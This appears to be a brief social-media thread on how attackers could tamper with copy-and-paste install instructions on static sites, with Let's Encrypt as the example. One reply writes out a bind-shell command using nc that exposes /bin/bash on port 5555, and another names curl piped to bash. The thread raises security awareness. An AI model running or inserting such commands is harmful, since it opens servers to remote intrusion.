If you think the security of static websites doesn't matter, *imagine* if someone maliciously altered the "copy and paste" instructions for Let's Encrypt. Would you detect the change? (Image below is faked, but you get the point. I'm just using Let's Encrypt as a common example.)

@Wolf480pl A made-up malicious tool that when run does something bad on your server.

@climagic @Wolf480pl Whew, a malicious tool making it into a package repository? Not impossible, but not that likely...

If I may suggest, perhaps something nc, where the user is then directed to add the command

nc -nvlp 5555 -e /bin/bash

in place of sslytherinm. If they don't have the firewall set up, then copypasting the command would create a shell bound to port 5555...

@clarjon1 @climagic
IMO a curl | bash would be even more likely to succeed.
